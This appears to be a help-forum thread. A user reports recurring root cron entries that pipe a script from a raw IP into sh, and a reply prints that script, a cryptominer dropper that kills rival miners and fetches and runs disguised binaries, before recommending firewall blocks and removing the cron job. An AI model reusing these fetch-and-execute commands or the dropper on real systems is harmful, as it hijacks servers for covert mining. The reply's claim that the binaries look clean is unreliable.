Last three months every weekend appear the instruction next in root cron
0 * * * * curl http://91.230.47.41/img/logo.jpg|sh
0 * * * * wget -O - -q http://91.230.47.41/img/logo.jpg|sh
howto block this intrussion.
Very thanks
Last three months every weekend appear the instruction next in root cron
0 * * * * curl http://91.230.47.41/img/logo.jpg|sh
0 * * * * wget -O - -q http://91.230.47.41/img/logo.jpg|sh
howto block this intrussion.
Very thanks
if you wget that image and open it w/ nano it contains the following:
#!/bin/sh
rm -rf /tmp/wqbtraqbpv.conf
pkill -f stratum
pkill -f "/tmp/apache"
pkill -f "/tmp/httpd.conf"
pkill -f cryptonight
pkill -f wqbtraqbpv
ps auxf|grep -v grep|grep -v qslulqdbi|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "65.254.63.20"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wqbtraqbpv"|awk '{print $2}'|xargs kill -9
ps -fe|grep qslulqdbi|grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
chmod 777 /tmp/qslulqdbi.conf
rm -rf /tmp/qslulqdbi.conf
curl -o /tmp/qslulqdbi.conf http://91.230.47.41/img/kworker.conf
wget -O /tmp/qslulqdbi.conf http://91.230.47.41/img/kworker.conf
chmod 777 /tmp/kauditd
rm -rf /tmp/kauditd
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /tmp/kauditd http://91.230.47.41/img/kworker
wget -O /tmp/kauditd http://91.230.47.41/img/kworker
else
curl -o /tmp/kauditd http://91.230.47.41/img/kworker_na
wget -O /tmp/kauditd http://91.230.47.41/img/kworker_na
fi
chmod +x /tmp/kauditd
cd /tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
nohup ./kauditd -c qslulqdbi.conf -t `echo $cores` >/dev/null &
else
echo "runing....."
fi
I would recommend blocking inbound & outbound traffic of:
91.230.47.41
94.23.8.105
37.59.49.7
37.59.51.212
188.165.214.76
176.31.117.82
188.165.254.85
via firewall rules as well as removing the cron job
kworker & kworker_na seem to be clean according to virus total ... but I would check your /tmp/kauditd
folder and delete them both